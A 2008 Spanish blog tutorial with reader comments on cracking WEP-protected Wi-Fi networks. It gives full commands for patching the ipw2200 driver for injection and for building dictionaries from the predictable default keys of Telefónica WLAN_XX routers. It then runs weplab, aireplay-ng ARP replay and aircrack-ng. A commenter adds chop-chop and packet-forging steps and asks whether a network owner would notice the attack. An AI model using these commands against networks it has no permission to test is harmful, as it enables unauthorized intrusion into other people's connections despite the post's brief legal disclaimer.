Una navaja con la que no se nos resistirá ninguna conexión inalámbrica. Este es un tema muy serio, debemos saber que piratear una red inalámbrica es un delito. El hacking no consiste en saltarse la seguridad de un sistema, consiste en aprender y entender. Sobre qué es y qué no es un hacker hay páginas a patadas así que no me lío. Lo primero es que para poder piratear una red, necesitamos entender cómo funciona y de qué vulnerabilidades vamos a aprovecharnos. Aquí explicaré lo básico y ampliaré con bibliografía, este es un tema realmente profundo y complejo.
Antes de nada recomendaría la lectura de 2 clásicos, el primero me trae gratos recuerdos:
- Manual hacking wireless para principiantes: Explica casi desde cero lo básico en referencia a la seguridad inalámbrica. Es un howto tremendo, de lo más leído de elhacker.net.
- Taller de redes WiFi del gran Vic_THOR: Este manual antes accesible en el foro de la revista hackxcrack (RIP) y ahora sólo descargándonos el backup del foro de la red, contiene un tratado sobre la redes inalámbricas que va desde la capa física a niveles más altos.
PARCHEANDO PARA REINYECTAR
Lo primero que haré es parchear mi chipset inalámbrico ipw2200 para que pueda reinyectar y así no tener que estar días para poder romper la clave de una red.
En la página oficial de la suite aircrack podremos encontrar un listado de chipsets y manuales para parchearlos para reinyectar. En concreto yo me baso en la última versión disponible para el ipw2200. Aquí tienes el hilo del foro donde el creador publicó el parche para la ipw2200.
Si leemos un poquito los enlaces anteriores veremos que el parche está pensado para el kernel 2.6.20, el que viene con Ubuntu Feisty 7.04. Para parchear una Ubuntu Gutsy siempre que tenga el kernel por defecto, el 2.6.22, tendremos que editar el parche como se explica en este hilo propuesto en los comentarios por tarin.
Estos son los pasos que he ejecutado (Hay algunos que cambian respecto de la wiki de Aircrack):
Me bajo la librería y la compilo:
wget -c http://superb-west.dl.sourceforge.net/sourceforge/ieee80211/ieee80211-1.2.17.tar.gz (Sí, sí con sudo)
tar xzf ieee80211-1.2.17.tar.gz
cd ieee80211-1.2.17
sudo make SHELL=/bin/bash
Le digo que “y” a todo
sudo make install SHELL=/bin/bash
Vemos que no tenemos errores.
Bajamos el último parche a día de hoy. Pincha aquí para bajártelo.
Después le toca el turno al driver:
wget -c http://superb-west.dl.sourceforge.net/sourceforge/ipw2200/ipw2200-1.2.1.tgz
tar zxvf ipw2200-1.2.1-inject_patch.tar.gz
tar zxvf ipw2200-1.2.1.tgz
Lo parcheo:
patch ipw2200-1.2.1/ipw2200.c ipw2200-1.2.1-inject.patch
patch ipw2200-1.2.1/Makefile ipw2200-1.2.1-inject_Makefile.patch
Lo instalo:
cd ipw2200-1.2.1
sudo ./remove-old
Le doy que “y” a todo
sudo make
sudo make install
Ahora cargamos el módulo nuevo:
sudo modprobe ipw2200 rtap_iface=1
Edito el fichero /etc/modprobe.d/options y añado la línea:
options ipw2200 rtap_iface=1
Si hacemos ifconfig -a veremos como nos lista la nueva interfaz rtap0.
INSTALANDO AIRCRACK
Nos va a hacer falta. Para ello basta con ejecutar el comando:
sudo apt-get install aircrack
Aquí tenéis un manual para hacer funcionar aireplay con los ataques que soporte vuestro parche.
Con este comando hemos instalado el aircrack, airodump, airmon y el aireplay.
DICCIONARIOS PARA LAS REDES WLAN_XX, LAS adslxxxx, LAS D-LINK WIRELESS…
Las redes te telefónica tienen siempre un ESSID del tipo WLAN_XX con la particularidad que los primeros pares de la mac del AP (BSSID) y estos dos dígitos XX forman parte de la contraseña por defecto de la red o clave WEP. Por eso si capturamos un solo paquete que contenga un IV podremos lanzar un ataque de diccionario que contenga todas las posibles combinaciones que contengan los dígitos anteriores. Para ello necesitamos un software que genere el diccionario. Del mismo modo ocurre con las redes inalámbricas de ONO, Orange…
En la actualidad existen diversas alternativas, la mayoría están programadas para funcionar sobre Windows, lo que me sorprende ya que no es el entorno pensado para la auditoría inalámbrica:
- WlanDecrypter de RusoBlanco: Su página web está offline desde hace tiempo, así que he subido el source para Linux de la que fue su última versión a mi servidor. Lo podéis descargar desde aquí.
- Easy Wep Finder EWF: Este programa hecho por MADMAX32 podréis encontrarlo en este hilo del subforo de hacking wireless de elhacker (Probablemente el mejor foro sobre este tema en español). El caso es que es una aplicación web que funciona conjuntamente con otro programa para Windows apodado WLAN_Ripper 1.1. En el hilo anterior podéis enteraros de cómo instalarlo y hacerlo funcionar, cada programa trae sus respectivos manuales.
Yo no lo he usado nunca, pero es el software más actualizado a día de hoy para estas redes. Incluye los nuevos APs sacados en el 2007 por Telefónica, es capaz de romper claves generadas a partir de passphrase, claves de redes ONO, Orange…
Por lo que entiendo EWF es una interfaz web que nos facilita que comando tenemos que ejecutar en nuestro Windows para que WLAN_Ripper obtenga la clave, es la interfaz visual.
Claro que también podemos bajarnos la suite de WLAN_Ripper que es independiente de EWF y aprender a usarla por nuestra cuenta. De momento explicaré como usar el primero, ya que está diseñado para Linux, pero no descarto otro día hacer un tutorial de cómo hacer funcionar el segundo, a lo mejor con Wine.
Lo primero que hacemos es bajarnos el WlanDecrypter y compilarlo.
wget -c http://www.infolinuxblog.com/subidas/wlandecrypter-0.5.tar.gz
tar xzf wlandecrypter-0.5.tar.gz
cd wlandecrypter-0.5/
make
sudo make install
Nos genera el binario wlandecrypter. Ahora para generar el diccionario haremos:
./wlandecrypter BSSID ESSID
FUERZA BRUTA
Para hacer el ataque usando el diccionario necesitaremos un programa de fuerza bruta para paquetes inalámbricos. Las dos grandes opciones son weplab y wepattack. Yo usaré weplab. En su página oficial podemos encontrar toda la información referente a este software multisistema, cómo compilarlo, dependencias, últimas versiones, ejemplos, etc. En Debian y Ubuntu bastará:
sudo apt-get install weplab
TODO A LA VEZ
A mi la entrada a weplab me gusta pasársela por la entrada estándar. Así que hay dos opciones. Sobre el fichero .cap (no os confundáis al capturar tráfico en poner solo ivs). Hago:
cat diccionario | weplab --key 128 -y --bssid bssid archivo_de_paquetes.cap
o bien:
./wlandecrypter BSSID ESSID | weplab --key 128 -y --bssid bssid archivo_de_paquetes
REINYECTANDO TRÁFICO
Bastará con poner a la interfaz rtap0, que está en modo monitor a capturar. Después hago un ataque de tipo3 con la interfaz eth1 y finalmente cuando tenga suficientes IVs, crackeo la clave con el aircrack:
airodump-ng -w intento1 rtap0
sudo aireplay-ng -3 -b BSSID -h MAC_CLIENTE -i rtap0 eth1
aircrack-ng intento1-01.cap
Con suerte obtendremos un bonito: KEY FOUND!
Artículos relacionados:
Miko Comenta:
January 11th, 2008 a las 6:16 pm
WifiSlax ahorra toda esa faena. LiveCD, o bien, instalado en un pendrive como lo tengo yo, y listo! a volar!.
http://www.wifislax.com/
Enjoy it!
tarin Comenta:
January 11th, 2008 a las 9:57 pm
Hola, esto ya trate de hacerlo hace un par de semanas y tengo problemas con el kernel.
Podrías indicarme como instalarlo a mano o a través de repositorios.
Gracias
J2G2 Comenta:
January 11th, 2008 a las 10:44 pm
El comentario no es sobre el artículo que me parece interesante aunque como Miko utilizo Wifislax… La pregunta es para Miko, como has conseguido ponerlo en el llavero? todos los procedimientos que he probado me han dado error, sólo he conseguido que arranque con w98 y como comprenderás no es lo que busco, busco arranque dual,, ubuntu/xp si es posible igual que tengo mi portatil, aunque reconozco que cada vez uso menos xp y más Ubuntu.
Gracias
tarin Comenta:
January 12th, 2008 a las 12:07 am
ok olvida lo que dije anteriormente, ya he compliado los drivers y parcheado correctamente usando el kernel de gutsy la solución la tienes en un mismo post que dejaste, concretamente aqui
http://tinyshell.be/aircrackng/forum/index.php?topic=400.msg13341#msg13341
gracias por las ideas
Miko Comenta:
January 12th, 2008 a las 11:29 am
Para J2G2
Para ponerlo en el PenDrive: http://foro.seguridadwireless.net/index.php/topic,5335.0.html
Enjoy it!
Miguel Comenta:
January 12th, 2008 a las 8:40 pm
Bueno, en mi caso no soy nada partidario de liveCDs como forma de vida en Linux. Prefiero tener Ubuntu instalado y configurado a mi gusto, sin olvidarme de la importante ganancia de rendimiento en portátiles como el mío escasos en RAM. Un liveCD sirve para recuperar un sistema o perderle el miedo a Linux, pero debería quedar en eso.
Además creo que aprender a instalar y compilar todo lo anterior es muy didáctico y se puede aprender mucho más, que con todo hecho. Si se entiende lo anterior, se sabe cómo compilar, parchear (qué es un parche y cómo funciona), añadir módulos al kernel…
Me alegro tarin de que dieras con la solución para que funcione en el 2.6.22. Como ya puse al principio mi método era para el 2.6.20, ahora actualizo, gracias.
Saludos
John Comenta:
January 15th, 2008 a las 10:54 am
Hi,
I have followed your guide (I can read Spanish but I cannot write it correctly, feel free to answer in Spanish) and I have found the following problem…
I do also have an ipw2200 driver and I have compiled everything, patched etc etc and I got no error message, so that I assume it went fine…
Now…
I use “sudo iwlist eth1 scan” and it yields, among a number of other cells:
Cell 11 - Address: 00:60:B3:ED:CD:68
ESSID:”WLAN_02″
Protocol:IEEE 802.11bg
Mode:Master
Channel:9
Frequency:2.452 GHz (Channel 9)
Encryption key:on
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 6 Mb/s; 9 Mb/s
11 Mb/s; 12 Mb/s; 18 Mb/s; 22 Mb/s; 24 Mb/s
36 Mb/s; 48 Mb/s; 54 Mb/s
Quality=33/100 Signal level=-80 dBm
Extra: Last beacon: 1788ms ago
——————————————————————————–
After that I run
$ sudo aireplay-ng -3 -b 00:60:B3:ED:CD:68 -h 00:0E:35:85:09:F8 -i rtap0 eth1
Saving ARP requests in replay_arp-0114-224752.cap
You should also start airodump-ng to capture replies.
Read 259689 packets (got 0 ARP requests), sent 0 packets…(0 pps)
As you can see, it didn’t sent any packet!
——————————————————————————–
And airodump-ng only captured a smal number of data… in the first five minutes. I let it run over night and after nine hours… it didn’t make any progress
$ sudo airodump-ng –ivs -c 9 -w capture -i rtap0
CH 9 ][ Elapsed: 9 hours 22 mins ][ 2008-01-15 08:11 ins ][ 2008-01-15 07:34
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:19:CB:38:CF:33 255 3 7990 0 0 7 54. WEP WEP WLAN_2D
00:13:49:88:F4:27 255 10 602 0 0 2 54. WEP WEP WLAN_F0
00:60:B3:D7:2C:3D 255 17 6254 0 0 3 54. WEP WEP WLAN_B9
00:13:49:95:3B:DF 255 1 346 0 0 11 54. WEP WEP WLAN_AD
00:14:7F:2F:4D:BF 255 3 14910 0 0 11 48 WEP WEP SpeedTouch5E8315
00:60:B3:ED:CD:68 255 13 1476 12239 0 9 54. WEP WEP WLAN_02
BSSID STATION PWR Lost Packets Probes
——————————————————————————–
And, of course, I don’t get the key… the data are not enough
elachistos| sudo aircrack-ng capture-01.ivs /tmp (22:55)
[sudo] password for pau:
Opening capture-01.ivs
Read 12239 packets.
# BSSID ESSID Encryption
1 00:60:B3:ED:CD:68 WEP (12239 IVs)
Choosing first network as target.
Aircrack-ng 0.9
[00:08:14] Tested 2989345 keys (got 12239 IVs)
KB depth byte(vote)
0 0/ 1 75( 13) A3( 3) B9( 3) 00( 0) 01( 0) 02( 0) 03( 0) 04( 0) 05( 0)
1 4/ 5 EA( 12) D9( 4) 05( 3) 0D( 3) 52( 3) E8( 3) 00( 0) 01( 0) 02( 0)
2 1/ 2 36( 12) D2( 4) 26( 3) 5C( 3) 7A( 3) 86( 3) 9A( 3) CE( 3) F9( 3)
3 5/ 6 CD( 3) 00( 0) 01( 0) 02( 0) 03( 0) 04( 0) 05( 0) 06( 0) 07( 0)
4 0/ 1 F2( 15) 3D( 5) 09( 3) 52( 3) AA( 3) EA( 3) 00( 0) 01( 0) 02( 0)
5 40/ 45 D9( 3) DA( 3) EB( 3) F6( 3) F9( 3) 00( 0) 01( 0) 02( 0) 03( 0)
6 0/ 1 83( 12) 48( 5) 54( 5) 21( 3) 45( 3) B7( 3) 00( 0) 01( 0) 02( 0)
Attack failed. Possible reasons:
* Out of luck: you must capture more IVs. Usually, 104-bit WEP
can be cracked with about one million IVs, sometimes more.
* If all votes seem equal, or if there are many negative votes,
then the capture file is corrupted, or the key is not static.
* A false positive prevented the key from being found. Try to
disable each korek attack (-k 1 .. 17), raise the fudge factor
(-f)
What am I doing wrong?
Thanks in advance
Miguel Comenta:
January 16th, 2008 a las 10:37 am
Hello John:
I have no problem at all answering you in English. Until today I have written everything in my blog in Spanish but I don’t rule out writing some articles in English in soon future.
PATCHING
First. For being able to check if the patch process was successful, it should be enough to have rtap0 interface listed when you do “ifconfig -a”. As you have used aireplay with that iface without having issues, we can assume everything is right.
HABITUAL REINJECTION PROBLEMS
Now, If you have read something about hacking wireless. There are 2 main points when trying to crack a WEP key. Usually for being able to reinject traffic you should have a pretty high quality link, let’s say I have never achieved it with less than 55/100.
If the signal you get is good enough, the problem might be that there are no ARP packets. I recommend you to read about ARP if you don’t what is this protocol for. Usually the easiest way to get one of these packets is by luck, in other words, other client associates to the network or trying to force deauthentication of the network clients. That’s way I left a tutorial about aireplay attacks and possibilities, I hope you have had a look at it.
NUMBER OF IVs
As you haven’t reinjected any packet at all, the number of IVs you have is a common low one after some minutes of monitor mode. So you have by no means an enough amount of IVs. That’s why aircrack is prompting you that something is wrong.
As you seem English native you should read aircrack wiki in English.
http://www.aircrack-ng.org/doku.php
Here you can find complete documentation about every software included in this wireless suite. You might be interested in reading this one:
http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=acb79c8efb8482aa89e9452c261570b6
Where you can get answered faq such as: ¿how many ivs do I need? ¿what is the korek attack? ¿what’s the fudge factor?
TIP
As I see you are trying to crack a WLAN_XX wireless lan. So why don’t you give a try a dictionary attack as I explain in this post. That probably would help you.
I hope you find this information useful, sorry If I’m not more verbose, but nowadays there are great guides all over the Internet, explaining the internals and issues about hacking wireless.
You are welcome, see you!
John Comenta:
January 16th, 2008 a las 11:33 am
This is the way I did it:
sudo iwconfig eth1 essid channel key s:fakekey mode managed
sudo airodump-ng -c –bssid -w dump rtap0
chop-chop:
sudo aireplay-ng -4 -a -h 00:11:22:33:44:55 -i rtap0 eth1
tcpdump -r replay_dec-1120-125311.cap
–> you get an IP and thus, can forge a valid ARP packet
packetforge-ng -0 -a BSSID -h 00:11:22:33:44:55 -k (the IP you got, for istance something like 10.1.17.1) -l 10.255.255.255 -y the_file_you_got_with.xor -w arp-request
everything in a single line, of course
Now inject the forged packet:
sudo aireplay-ng -2 -r arp-request eth1
and aircrack-ng -z dump-*.cap
Using the BETA VERSION of aircrack (1.0) will crack the wep with less than 20k IVs… so that you’ll need less than ten minutes.
Using the previous version of aircrack I had over 1.5 million IVs and it could not find the wep. This is due to the reason that alpha aircrack has commuted the algorithm and is using now what the clever guys of Darmstadt developed. It’s MUCH faster
Thanks for your howto; it was useful to find the way to the solution.
And… no, I’m not native English… mas bien todo lo contrario (jejejeje)
John Comenta:
January 16th, 2008 a las 11:36 am
Otra cosa… que experiencia teneis en generar este tipo de trafico? Quiero decir… un usuario medianamente inteligente… habria notado que su enrutador estaba respondiendo a millones de solicitudes de paquetes “de repente”? Si si, que poder tiene esta persona para acceder a la conexion hecha con el ordenador “pirata” (todo esto es teorico, claro, nunca atacaria una conexion que no fuera la mia)
Miguel Comenta:
January 16th, 2008 a las 3:39 pm
Bueno John,
Me tienes totalmente confundido ¿por qué escribiste el primer mensaje en inglés diciendo que no escribías bien en español? y ahora resulta que sí. No entiendo que estás buscando con ese comportamiento.
Un saludo
timidin Comenta:
January 20th, 2008 a las 11:23 pm
De donde se puede descargar el backup del foro del Taller de redes WiFi del gran Vic_THOR que comentas?
Gracias.
Miguel Comenta:
January 21st, 2008 a las 12:21 pm
El backup, es del antiguo foro de hackxcrack. En la sección de wireless contenía este taller como chincheta. Vic_THOR, que era por aquel entonces administrador, hizo un instalador .exe que en Windows instala la que fue la última versión de este foro en tu ordenador. En concreto instala phpBB, apache y el foro. Puedes descargarlo de aquí:
http://www.odiss.org/manuales/hxc/ForoHxCv2.0.exe
Que yo sepa para Linux no hubo versión, pero puedes extraerlo del exe con un poco de maña, una máquina virtual o wine.
Un saludo
John Comenta:
January 28th, 2008 a las 6:04 pm
hola… lo siento. El Castellano no es mi lengua materna y no me siento seguro, por eso te escribi en Ingles, pero luego me anime…